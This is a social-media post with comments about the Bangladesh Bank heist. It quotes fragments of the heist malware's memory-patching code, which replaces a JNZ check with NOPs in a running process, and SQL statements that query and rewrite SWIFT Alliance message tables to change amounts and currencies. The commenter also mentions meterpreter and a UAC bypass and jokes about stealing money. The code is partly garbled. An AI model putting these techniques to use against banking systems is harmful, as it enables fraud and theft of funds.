Bangladesh+Bank+ Heist

If

(VirtualProtectEx) (hProcess,lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&v (hProcess)&& ReadProcessMemory (hProcess, lpAddr, &buffer, 2, &dwRead))

{

if

(bPatch)

{
if(WORD)buffer == JNZ)
res = WriteProcessMemory (hProcess , lpAddr, &NOPs, 2, &dwWritten);
}

Else

{

If

((WORD)buffer == NOPs) res = WriteProcessMemory
(hProcess , lpAddr, &JNZ, 2, & dwWritten);

}

If

(res)VirtualProtectEx (hProcess , lpAddr, 2, hProcess, &flOldProtect);

}

GostoMostrar mais reações

ComentarPartilhar

Comentários

Elsa David saturday, 10.25 am INTERPOL HQ good guys...

Gerir

Gosto

 · Responder · 2 h

Elsa David see the trick of the patch ...buffer JNZ opcode...gives it the breaktrough

Gerir

Gosto

 · Responder · 2 h

Elsa David it first searches on meterpreter for the module liboradb.dll

Gerir

Gosto

 · Responder · 2 h

Elsa David SELECT*FROM (SELECTJRNL_DISPLAY_TEXT,JRNL_DATE_TIME FROM SAAOWNER.JRNL_%s WHERE JRNL_DISPLAY_TEXTLIKE '%%LT: BBHOBDDHA: Log%%' ORDER BY JRNL_DATE_TIME_DESC) A WHERE ROWNUM = 1;

Gerir

Gosto

 · Responder · 2 h

Elsa David BBHOBDDHA swift code

Gerir

Gosto

 · Responder · 2 h

Elsa David the way I understand it :) select processes which displays data and time...numbers of journals (diaries) in text like numbers on strings and log to swift DB where a row is equal to 1

Gerir

Gosto

 · Responder · 2 h · Editado

Elsa David so the guy stole swift transferences already made 2 days before the attack

Gerir

Gosto

 · Responder · 2 h

Elsa David this means he stolen lots of milionaire bitches :)

Gerir

Gosto

 · Responder · 2 h · Editado

Elsa David and then based on the destiny swift code he changed the destiny...and bingo...my offshore account...and GN

Gerir

Gosto

 · Responder · 2 h

Elsa David as soon as, any backdoor UAC bypass gave me the dll of the library of oracle DB...he decoded the x64 by adding two bytes that modified the following 8 bytes of the hash

Gerir

Gosto

 · Responder · 2 h

Elsa David UPDATE SAAOWNER.MESG_%s SET
MESG_FIN_CCY_AMOUNT ='%s'+WHERE MESG_S_UMID = '%s'm
UPDATE SAAOWNER.TEXT_%s SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('%s') ...Ver mais

Gerir

Gosto

 · Responder · 2 h

Elsa David he then...changed the currency with another currency ID

Gerir

Gosto

 · Responder · 2 h

Elsa David and I'm not seeing what they mean by sending the confirmation of the operation to a local printer?

Gerir

GostoMostrar mais reações

 · Responder · 2 h

Elsa David ;)

Gerir

GostoMostrar mais reações

 · Responder · 2 h

Elsa David no se pasa nada compadre Viktor Bout ...I'm just having fun

Gerir

GostoMostrar mais reações

 · Responder · 1 h

Elsa David do as you like mr.keynes The Wall Street Journal I get out of here with my money